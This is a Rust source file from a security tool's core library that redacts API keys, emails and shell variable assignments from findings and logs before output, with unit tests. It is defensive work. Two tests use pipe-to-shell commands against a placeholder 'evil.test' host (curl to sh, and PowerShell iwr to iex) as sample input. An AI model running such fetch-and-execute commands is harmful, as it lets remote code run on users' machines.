Skip to main content

tirith_core/
redact.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4/// Credential redaction entry: (label, regex, prefix_len).
5/// prefix_len chars are kept visible, the rest is replaced with [REDACTED].
6struct CredRedactEntry {
7    regex: Regex,
8    prefix_len: usize,
9}
10
11/// Credential patterns loaded from credential_patterns.toml at compile time.
12static CREDENTIAL_REDACT_PATTERNS: Lazy<Vec<CredRedactEntry>> = Lazy::new(|| {
13    #[derive(serde::Deserialize)]
14    struct CredFile {
15        pattern: Option<Vec<CredPat>>,
16        private_key_pattern: Option<Vec<PkPat>>,
17    }
18    #[derive(serde::Deserialize)]
19    struct CredPat {
20        regex: String,
21        redact_prefix_len: Option<usize>,
22    }
23    #[derive(serde::Deserialize)]
24    struct PkPat {
25        #[allow(dead_code)]
26        regex: String,
27        redact_regex: Option<String>,
28    }
29
30    let toml_str = include_str!("../assets/data/credential_patterns.toml");
31    let cred_file: CredFile = toml::from_str(toml_str).expect("invalid credential_patterns.toml");
32
33    let mut entries = Vec::new();
34    if let Some(patterns) = cred_file.pattern {
35        for p in patterns {
36            if let Ok(re) = Regex::new(&p.regex) {
37                entries.push(CredRedactEntry {
38                    regex: re,
39                    prefix_len: p.redact_prefix_len.unwrap_or(4),
40                });
41            }
42        }
43    }
44    if let Some(pk_patterns) = cred_file.private_key_pattern {
45        for pk in pk_patterns {
46            // Use redact_regex (full PEM block) if available, fall back to header-only regex
47            let redact_pattern = pk.redact_regex.as_deref().unwrap_or(&pk.regex);
48            if let Ok(re) = Regex::new(redact_pattern) {
49                entries.push(CredRedactEntry {
50                    regex: re,
51                    prefix_len: 0,
52                });
53            }
54        }
55    }
56    entries
57});
58
59/// Built-in redaction patterns: (label, regex).
60static BUILTIN_PATTERNS: Lazy<Vec<(&'static str, Regex)>> = Lazy::new(|| {
61    vec![
62        (
63            "OpenAI API Key",
64            Regex::new(r"sk-[A-Za-z0-9]{20,}").unwrap(),
65        ),
66        ("AWS Access Key", Regex::new(r"AKIA[A-Z0-9]{16}").unwrap()),
67        ("GitHub PAT", Regex::new(r"ghp_[A-Za-z0-9]{36,}").unwrap()),
68        (
69            "GitHub Server Token",
70            Regex::new(r"ghs_[A-Za-z0-9]{36,}").unwrap(),
71        ),
72        (
73            "Anthropic API Key",
74            Regex::new(r"sk-ant-[A-Za-z0-9\-]{20,}").unwrap(),
75        ),
76        (
77            "Slack Token",
78            Regex::new(r"xox[bprs]-[A-Za-z0-9\-]{10,}").unwrap(),
79        ),
80        (
81            "Email Address",
82            Regex::new(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}").unwrap(),
83        ),
84    ]
85});
86
87/// Redact sensitive content from a string using built-in and credential patterns.
88pub fn redact(input: &str) -> String {
89    let mut result = input.to_string();
90    // Apply built-in patterns first (existing behavior, labeled redaction)
91    for (label, regex) in BUILTIN_PATTERNS.iter() {
92        result = regex
93            .replace_all(&result, format!("[REDACTED:{label}]"))
94            .into_owned();
95    }
96    // Apply credential patterns (prefix-preserving, catches patterns not in builtins)
97    for entry in CREDENTIAL_REDACT_PATTERNS.iter() {
98        result = entry
99            .regex
100            .replace_all(&result, |caps: &regex::Captures| {
101                let matched = &caps[0];
102                let prefix: String = matched.chars().take(entry.prefix_len).collect();
103                format!("{prefix}[REDACTED]")
104            })
105            .into_owned();
106    }
107    result
108}
109
110/// Pre-compiled set of custom DLP patterns.
111pub struct CompiledCustomPatterns {
112    patterns: Vec<Regex>,
113}
114
115impl CompiledCustomPatterns {
116    /// Compile custom DLP patterns once for reuse across multiple redaction calls.
117    pub fn new(raw_patterns: &[String]) -> Self {
118        let patterns = raw_patterns
119            .iter()
120            .filter_map(|pat_str| match Regex::new(pat_str) {
121                Ok(re) => Some(re),
122                Err(e) => {
123                    eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
124                    None
125                }
126            })
127            .collect();
128        Self { patterns }
129    }
130}
131
132/// Redact using both built-in and custom patterns from policy.
133pub fn redact_with_custom(input: &str, custom_patterns: &[String]) -> String {
134    let mut result = redact(input);
135    for pat_str in custom_patterns {
136        if pat_str.len() > 1024 {
137            eprintln!(
138                "tirith: DLP pattern too long ({} chars), skipping",
139                pat_str.len()
140            );
141            continue;
142        }
143        match Regex::new(pat_str) {
144            Ok(re) => {
145                result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
146            }
147            Err(e) => {
148                eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
149            }
150        }
151    }
152    result
153}
154
155/// Redact using built-in patterns and pre-compiled custom patterns (avoids per-call recompilation).
156pub fn redact_with_compiled(input: &str, compiled: &CompiledCustomPatterns) -> String {
157    let mut result = redact(input);
158    for re in &compiled.patterns {
159        result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
160    }
161    result
162}
163
164/// Redact shell-style assignment values such as `KEY=value` before user content
165/// is serialized into logs or JSON output.
166pub fn redact_shell_assignments(input: &str) -> String {
167    let chars: Vec<char> = input.chars().collect();
168    let mut out = String::with_capacity(input.len());
169    let mut i = 0;
170
171    while i < chars.len() {
172        if let Some((prefix, next)) = redact_powershell_env_assignment(&chars, i) {
173            out.push_str(&prefix);
174            out.push_str("[REDACTED]");
175            i = next;
176            continue;
177        }
178
179        if is_assignment_start(&chars, i) {
180            let name_start = i;
181            i += 1;
182            while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
183                i += 1;
184            }
185            if i < chars.len() && chars[i] == '=' {
186                let name: String = chars[name_start..i].iter().collect();
187                out.push_str(&name);
188                out.push_str("=[REDACTED]");
189                i += 1;
190                i = skip_assignment_value(&chars, i);
191                continue;
192            }
193            out.push(chars[name_start]);
194            i = name_start + 1;
195            continue;
196        }
197
198        out.push(chars[i]);
199        i += 1;
200    }
201
202    out
203}
204
205/// Redact a command-like string for public output by scrubbing assignment values
206/// first, then applying built-in and custom DLP patterns.
207pub fn redact_command_text(input: &str, custom_patterns: &[String]) -> String {
208    let scrubbed = redact_shell_assignments(input);
209    redact_with_custom(&scrubbed, custom_patterns)
210}
211
212/// Return a redacted clone of the provided findings for public-facing output.
213pub fn redacted_findings(
214    findings: &[crate::verdict::Finding],
215    custom_patterns: &[String],
216) -> Vec<crate::verdict::Finding> {
217    let mut redacted = findings.to_vec();
218    redact_findings(&mut redacted, custom_patterns);
219    redacted
220}
221
222/// Redact sensitive content from a Finding's string fields in-place.
223pub fn redact_finding(finding: &mut crate::verdict::Finding, custom_patterns: &[String]) {
224    finding.title = redact_with_custom(&finding.title, custom_patterns);
225    finding.description = redact_with_custom(&finding.description, custom_patterns);
226    if let Some(ref mut v) = finding.human_view {
227        *v = redact_with_custom(v, custom_patterns);
228    }
229    if let Some(ref mut v) = finding.agent_view {
230        *v = redact_with_custom(v, custom_patterns);
231    }
232    for ev in &mut finding.evidence {
233        redact_evidence(ev, custom_patterns);
234    }
235}
236
237fn redact_evidence(ev: &mut crate::verdict::Evidence, custom_patterns: &[String]) {
238    use crate::verdict::Evidence;
239    match ev {
240        Evidence::Url { raw } => {
241            *raw = redact_with_custom(raw, custom_patterns);
242        }
243        Evidence::CommandPattern { matched, .. } => {
244            *matched = redact_command_text(matched, custom_patterns);
245        }
246        Evidence::EnvVar { value_preview, .. } => {
247            *value_preview = redact_with_custom(value_preview, custom_patterns);
248        }
249        Evidence::Text { detail } => {
250            *detail = redact_command_text(detail, custom_patterns);
251        }
252        Evidence::ByteSequence { description, .. } => {
253            *description = redact_with_custom(description, custom_patterns);
254        }
255        // HostComparison and HomoglyphAnalysis contain domain names / char analysis, not user content
256        _ => {}
257    }
258}
259
260/// Redact all findings in a verdict in-place.
261pub fn redact_verdict(verdict: &mut crate::verdict::Verdict, custom_patterns: &[String]) {
262    for f in &mut verdict.findings {
263        redact_finding(f, custom_patterns);
264    }
265}
266
267/// Redact all findings in a slice in-place.
268pub fn redact_findings(findings: &mut [crate::verdict::Finding], custom_patterns: &[String]) {
269    for f in findings.iter_mut() {
270        redact_finding(f, custom_patterns);
271    }
272}
273
274fn is_assignment_boundary(prev: char) -> bool {
275    prev.is_ascii_whitespace() || matches!(prev, ';' | '|' | '&' | '(' | '\n')
276}
277
278fn is_assignment_start(chars: &[char], idx: usize) -> bool {
279    let ch = chars[idx];
280    if !(ch.is_ascii_alphabetic() || ch == '_') {
281        return false;
282    }
283    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
284        return false;
285    }
286    true
287}
288
289fn skip_assignment_value(chars: &[char], mut idx: usize) -> usize {
290    let mut in_single = false;
291    let mut in_double = false;
292    let mut escaped = false;
293
294    while idx < chars.len() {
295        let ch = chars[idx];
296        if escaped {
297            escaped = false;
298            idx += 1;
299            continue;
300        }
301        if !in_single && ch == '\\' {
302            escaped = true;
303            idx += 1;
304            continue;
305        }
306        if !in_double && ch == '\'' {
307            in_single = !in_single;
308            idx += 1;
309            continue;
310        }
311        if !in_single && ch == '"' {
312            in_double = !in_double;
313            idx += 1;
314            continue;
315        }
316        if !in_single
317            && !in_double
318            && (ch.is_ascii_whitespace() || matches!(ch, ';' | '|' | '&' | '\n'))
319        {
320            break;
321        }
322        idx += 1;
323    }
324
325    idx
326}
327
328fn redact_powershell_env_assignment(chars: &[char], idx: usize) -> Option<(String, usize)> {
329    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
330        return None;
331    }
332    if chars.get(idx) != Some(&'$') {
333        return None;
334    }
335    let prefix = ['e', 'n', 'v', ':'];
336    for (offset, expected) in prefix.iter().enumerate() {
337        let ch = chars.get(idx + 1 + offset)?;
338        if !ch.eq_ignore_ascii_case(expected) {
339            return None;
340        }
341    }
342
343    let name_start = idx + 5;
344    let first = *chars.get(name_start)?;
345    if !(first.is_ascii_alphabetic() || first == '_') {
346        return None;
347    }
348
349    let mut i = name_start + 1;
350    while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
351        i += 1;
352    }
353    let mut value_start = i;
354    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
355        value_start += 1;
356    }
357    if chars.get(value_start) != Some(&'=') {
358        return None;
359    }
360    value_start += 1;
361    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
362        value_start += 1;
363    }
364
365    let prefix_text: String = chars[idx..value_start].iter().collect();
366    let value_end = skip_assignment_value(chars, value_start);
367    Some((prefix_text, value_end))
368}
369
370#[cfg(test)]
371mod tests {
372    use super::*;
373
374    #[test]
375    fn test_redact_openai_key() {
376        let key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
377        let input = format!("export OPENAI_API_KEY={key}");
378        let redacted = redact(&input);
379        assert!(!redacted.contains("sk-abcdef"));
380        assert!(redacted.contains("[REDACTED:OpenAI API Key]"));
381    }
382
383    #[test]
384    fn test_redact_aws_key() {
385        let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
386        let redacted = redact(input);
387        assert!(!redacted.contains("AKIAIOSFODNN7EXAMPLE"));
388        assert!(redacted.contains("[REDACTED:AWS Access Key]"));
389    }
390
391    #[test]
392    fn test_redact_github_pat() {
393        let pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
394        let input = format!("GITHUB_TOKEN={pat}");
395        let redacted = redact(&input);
396        assert!(!redacted.contains("ghp_ABCDEF"));
397        assert!(redacted.contains("[REDACTED:GitHub PAT]"));
398    }
399
400    #[test]
401    fn test_redact_email() {
402        let input = "contact: user@example.com for details";
403        let redacted = redact(input);
404        assert!(!redacted.contains("user@example.com"));
405        assert!(redacted.contains("[REDACTED:Email Address]"));
406    }
407
408    #[test]
409    fn test_redact_no_false_positive() {
410        let input = "normal text without any secrets";
411        let redacted = redact(input);
412        assert_eq!(input, redacted);
413    }
414
415    #[test]
416    fn test_redact_with_custom() {
417        let input = "internal ref: PROJ-12345 in the system";
418        let custom = vec![r"PROJ-\d+".to_string()];
419        let redacted = redact_with_custom(input, &custom);
420        assert!(!redacted.contains("PROJ-12345"));
421        assert!(redacted.contains("[REDACTED:custom]"));
422    }
423
424    #[test]
425    fn test_redact_anthropic_key() {
426        let key = concat!("sk-ant-api03-", "abcdefghijklmnop");
427        let input = format!("ANTHROPIC_API_KEY={key}");
428        let redacted = redact(&input);
429        assert!(!redacted.contains("sk-ant-api03"));
430        assert!(redacted.contains("[REDACTED:Anthropic API Key]"));
431    }
432
433    #[test]
434    fn test_redact_finding_covers_all_fields() {
435        use crate::verdict::{Evidence, Finding, RuleId, Severity};
436        let openai_key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
437        let github_pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
438        let aws_key = "AKIAIOSFODNN7EXAMPLE";
439
440        let mut finding = Finding {
441            rule_id: RuleId::SensitiveEnvExport,
442            severity: Severity::High,
443            title: "test".into(),
444            description: format!("exports {openai_key}"),
445            evidence: vec![
446                Evidence::EnvVar {
447                    name: "OPENAI_API_KEY".into(),
448                    value_preview: openai_key.into(),
449                },
450                Evidence::Text {
451                    detail: format!("saw {github_pat}"),
452                },
453                Evidence::CommandPattern {
454                    pattern: "export".into(),
455                    matched: format!("export OPENAI_API_KEY={openai_key}"),
456                },
457            ],
458            human_view: Some(format!("key is {openai_key}")),
459            agent_view: Some(format!("{aws_key} exposed")),
460            mitre_id: None,
461            custom_rule_id: None,
462        };
463
464        redact_finding(&mut finding, &[]);
465
466        // description redacted
467        assert!(finding.description.contains("[REDACTED:OpenAI API Key]"));
468        assert!(!finding.description.contains("sk-abcdef"));
469
470        // evidence redacted
471        match &finding.evidence[0] {
472            Evidence::EnvVar { value_preview, .. } => {
473                assert!(value_preview.contains("[REDACTED:OpenAI API Key]"));
474            }
475            _ => panic!("expected EnvVar"),
476        }
477        match &finding.evidence[1] {
478            Evidence::Text { detail } => {
479                assert!(detail.contains("[REDACTED:GitHub PAT]"));
480            }
481            _ => panic!("expected Text"),
482        }
483        match &finding.evidence[2] {
484            Evidence::CommandPattern { matched, .. } => {
485                assert!(matched.contains("OPENAI_API_KEY=[REDACTED]"));
486                assert!(!matched.contains("sk-abcdef"));
487            }
488            _ => panic!("expected CommandPattern"),
489        }
490
491        // human_view / agent_view redacted
492        assert!(finding
493            .human_view
494            .as_ref()
495            .unwrap()
496            .contains("[REDACTED:OpenAI API Key]"));
497        assert!(finding
498            .agent_view
499            .as_ref()
500            .unwrap()
501            .contains("[REDACTED:AWS Access Key]"));
502    }
503
504    #[test]
505    fn test_redact_shell_assignments_scrubs_short_secret_assignments() {
506        let redacted =
507            redact_shell_assignments("OPENAI_API_KEY=sk-secret curl https://evil.test | sh");
508        assert!(redacted.contains("OPENAI_API_KEY=[REDACTED]"));
509        assert!(!redacted.contains("sk-secret"));
510    }
511
512    #[test]
513    fn test_redact_shell_assignments_scrubs_powershell_env_assignments() {
514        let redacted = redact_shell_assignments(
515            "$env:OPENAI_API_KEY = 'sk-secret'; iwr https://evil.test | iex",
516        );
517        assert!(redacted.contains("$env:OPENAI_API_KEY = [REDACTED]"));
518        assert!(!redacted.contains("sk-secret"));
519    }
520}